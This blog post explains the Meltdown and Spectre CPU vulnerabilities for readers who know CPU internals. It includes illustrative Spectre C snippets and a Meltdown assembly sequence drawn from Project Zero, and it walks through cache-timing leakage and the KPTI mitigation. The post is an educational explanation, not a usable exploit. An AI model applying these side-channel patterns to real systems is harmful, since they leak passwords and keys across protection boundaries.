Quantcast
Channel: Bit Bucket – Big Mess o' Wires
Viewing all articles
Browse latest Browse all 164

Meltdown and Spectre Vulnerabilities Explained

$
0
0

This week brought some fascinating news for CPU nerds: the revelation of security vulnerabilities in the basic hardware architecture of many modern processors. The Meltdown and Spectre vulnerabilities affect virtually all modern computers, according to a sensationalist headline at The Register which called them the “worst ever” CPU bugs. Unlike bugs in a specific software program or operating system that can be fixed with a patch, these are fundamental flaws in the very design of the CPU.

What are these vulnerabilities exactly, how do they work, and how are Meltdown and Spectre different from each other? I must have read twenty different news stories without finding a clear answer. The best I could get was that these vulnerabilities somehow involve the CPU’s use of speculative execution: an optimization trick that executes code before it’s known whether the code should really be executed, discarding the results if it’s later determined that the code wasn’t needed. But as a guy who designs custom CPUs as a hobby, I needed a better answer than that. So I started poking beyond the news headlines into the gory tech details.

What follows below is my attempt to explain Meltdown and Spectre to myself, and by extension to readers of this blog. It assumes readers already have some basic knowledge of concepts like CPU internals, caches, and operating systems. But moreso than normal for this blog, I’ll be discussing details that I don’t fully understand myself, and my explanations may be flawed. If you find an error or omission, kindly post a comment and let me know.

 
Speculative Execution + Caching = Vulnerability

Both Meltdown and Spectre exploit the fact that speculatively executed code can modify the CPU cache. Even if the code is never “really” executed, meaning that it never modifies CPU registers or memory or other processor state, the cache effects of the speculatively executed code can be observed by cleverly-constructed code that follows it, by testing what is and isn’t cached. Consider this example, taken from Google’s Project Zero Blog:

struct array {
  unsigned long length;
  unsigned char data[];
};

struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  ...
}

If arr1->length is not presently in the cache, the CPU won’t immediately know whether the if clause will evaluate true or false. If it guesses true, then the if body will execute speculatively while arr1->length is fetched from main memory. Speculative execution will cause arr1->data[untrusted_offset_from_caller] to be loaded from main memory into the cache. This behavior can be leveraged in several different ways (see below) to gain information about protected regions of memory that are supposed to be private: memory owned by other processes or the kernel. The ability to observe protected memory makes it possible to read passwords, Bitcoin keys, emails, or other sensitive information.

 
Spectre: Speculative Execution in Branch Prediction

The Spectre vulnerability requires getting the victim (the kernel or another process) to run specially-constructed code, which then leaks information through the cache effects of speculative execution. Consider an expanded version of the previous example.

struct array {
struct array {
  unsigned long length;
  unsigned char data[];
};

struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  unsigned long index2 = ((value&1)*0x100)+0x200;
  if (index2 < arr2->length) {
    unsigned char value2 = arr2->data[index2];
  }
}

If arr1->length is not currently in the cache, speculative execution will continue inside the body of the if clause. Either arr2->data[0x200] or arr2->data[0x300] will be fetched from main memory and cached, depending on the least significant bit of arr1->data[untrusted_offset_from_caller]. After the speculative execution has ended, the attacking user mode code can measure how much time is required to load arr2->data[0x200] and arr2->data[0x300]. Whichever one was cached will load faster, revealing whether the LSB of arr1->data[untrusted_offset_from_caller] is 0 or 1. By repeating this process with other bit masks, the attacker can eventually read all of arr1->data[untrusted_offset_from_caller]. And by the choice of untrusted_offset_from_caller, the attacker can read any memory location.

That’s the general idea. Some implementation details and optimization methods are described in the Project Zero blog. The blog also describes another Spectre variant exploiting speculative execution through indirect branches, which I didn’t examine.

How can a user process get the kernel to run this kind of specially-constructed code? It turns out that the Linux kernel has a feature called eBPF that’s designed for this exact purpose, presumably to allow for device drivers or socket filters or other snippets of user-provided code that need to run in the kernel. I’m assuming Windows and Mac OS have something similar. Since running arbitrary user-provided code in the kernel would be a huge security vulnerability itself, eBPF actually runs the code in an interpreter or a JIT engine. But that’s enough to exploit this vulnerability.

Note: after writing this post, I found a second explanation of Spectre from a group of academic researchers working independently from Google Project Zero. Their paper describes Spectre slightly differently, and discusses attacking other processes rather than the kernel. It also includes a proof of concept Javascript attack, in which a malicious bit of Javascript is able to read private memory from the web browser process. Relying on the fact that Javascript is typically JIT compiled to native code, and using debug tools to examine the native output, the authors were able to iteratively tweak the Javascript source code until it produced native code containing an exploitable conditional branch of the kind shown above.

Spectre affects essentially all modern CPUs, given the proper conditions: Intel, AMD, ARM, etc.

 
Meltdown: Exploiting Out of Order Execution

Meltdown is similar to Spectre, in that they both leak information through the cache from instructions that were never “really” executed. However, with Meltdown there’s no branching involved. The attack relies on the way modern CPUs optimize performance by employing out of order instruction execution. Due to the availability of CPU execution units and dependent data, instructions are sometimes executed in a different order than they appear in a program, but they are retired (registers and state are updated) in order. The fact that they were executed out of order should be invisible to the program, but Meltdown shows that’s not always true. The details are described at cyber.wtf and in a separate academic paper.

When instructions are executed out of order, but aren’t yet retired, their results exist in a kind of limbo that’s very similar to speculatively executed code from branch prediction. However, it’s not clear whether this should properly be called speculative execution. The Meltdown paper refers to these as “transient instructions”, which seems like a good term.

Consider this code:

mov rax, [someKernelAddress]
and rax, 1
mov rbx,[rax+someUserModeAddress]

The first instruction should cause an exception if executed from a user mode process, because it’s an attempt to access kernel memory. However, at least on Intel architectures, it appears that the exception doesn’t occur until the instruction is actually retired. If this code is executing as part of a transient instruction sequence, no exception will yet occur, the privilege violation (bypassing kernel memory protection) will be ignored, and the transient read will succeed. The following transient instructions that use the read value will also succeed, and will affect the cache state in the same way as Spectre, creating a side-channel for leaking information about kernel memory.

Eventually, the first instruction will be retired and the exception will occur. The state changes related to the following instructions will be discarded, because those instructions were never really executed, but their cache side effects will remain. After an exception handler resolves the exception, further code can measure how long it takes to load from address someUserModeAddress vs someUserModeAddress+1, thereby inferring the LSB of someKernelAddress. Further iterations can read the other bits.

To ensure that the Meltdown code sequence executes as an out-of-order transient sequence, the cyber.wtf technique includes a long series of filler instructions ahead of it. These filler instructions all use a different execution unit than the units needed by the Meltdown sequence, and create a long chain of interdependent instructions. So the CPU must sequentially execute the filler instructions one at a time, but meanwhile it can also jump ahead and execute the Meltdown instructions out of order.

Note that “out of order” here refers to the Meltdown code being executed out of order relative to the filler instructions. The Meltdown instructions themselves are executed in order relative to each other, since each one is dependent on the previous one.

At this time, Meltdown appears to be limited to Intel CPUs only. It’s uncertain whether this is due to a fundamental difference in how Intel handles memory protection with respect to out-of-order execution, or is simply due to differences in the size of the reorder buffer between CPU vendors. In a short aside on Meltdown, the Spectre paper states “Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.” However, the Meltdown paper reports that the authors were able to observe bypassing of memory protection during out of order execution on ARM and AMD processors too, but were unable to construct a working exploit.

 
Impact and Mitigation

Both of these vulnerabilities are very bad, enabling user mode code to read other protected memory. However, they’re both local exploits: the attacking code must be running on the machine being attacked, so an attacker must somehow get their code onto your machine first. For this reason, the greatest risk is probably to cloud computing environments, where processes from many different people are running on the same machine, supposedly isolated from one another thanks to memory protection. But there’s also a risk in any situation where one computer runs code received from another, even inside a VM or sandbox.

It’s not clear how Spectre can be fixed in software, because it relies on CPU features that are fundamental to all modern processors. In fact, I don’t think it can be fixed in software – at least not in any general way. One web site says, “as Spectre is not easy to fix, it will haunt us for a long time.” The only good news is that convincing the kernel to run an attacker’s special code with eBPF or other methods isn’t easy. And web browsers can be patched to protect against the sort of Javascript Spectre attacks described in the research paper. But other opportunities for Spectre attacks will remain. Future CPUs may contain hardware fixes for Spectre, but they’ll likely come with a complexity and performance penalty. Maybe cache lines will have to be treated as process-specific data instead of as shared resources.

Meltdown is the more serious of these two vulnerabilities, because it happens entirely in a single user space program and doesn’t require any special code in the victim process or kernel. In the real world, this makes it much easier for an attacker to exploit. Fortunately Meltdown can be fixed at the operating system level, but the fix carries a performance penalty that may be as high as 30%.

In the Meltdown sample code, readers may have wondered how an instruction like mov rax, [someKernelAddress] could possibly work in user mode code, even speculatively, since the kernel uses a different virtual to physical address mapping than the user mode process. It turns out that Linux (and I assume other operating systems too) maps the kernel’s memory into the address space of every user process, for performance reasons. By keeping the kernel permanently mapped, there’s no need to flush the TLB when switching between user and kernel space, and TLB entries for kernel space never need to be flushed. The processor’s MMU can normally be trusted to prevent user processes from accessing this kernel memory – except in the case we’ve just seen. The details are nicely explained in the description of a related technology named KAISER.

The “fix” is KPTI: kernel page table isolation. This ends the longstanding practice of mapping kernel memory into the address space of user processes. This ensures that mov rax, [someKernelAddress] won’t be able to reveal any information. However, it means that the TLB must be flushed every time there’s a switch between user and kernel code. If a user process makes frequent kernel calls, the constant TLB flushing will be expensive and have a significant negative performance impact.

 
The Future

Meltdown and Spectre are scary, not only because of what they can do themselves, but because they introduce a Pandora’s Box of new vulnerability types we’re sure to see more of in the future. We can no longer think about security analysis as something that gets applied to specific software programs or operating systems, examining the code and imagining it being executed instruction by instruction in an abstract environment. We must now consider the specific highly complex CPU (often not fully documented) that runs this software, and understand the many subtle ways in which the true hardware behavior differs from the instruction-by-instruction conceptual model.

The KAISER document mentions techniques like exploiting timing differences in fault handling, observing the behavior of prefetch instructions, and forcing faults using the Intel TSX (transactional memory) instructions. This will be a new frontier for most developers, forcing them to peel back a layer of abstraction when evaluating future computer security issues. The world just got a lot more complicated.


Viewing all articles
Browse latest Browse all 164

Trending Articles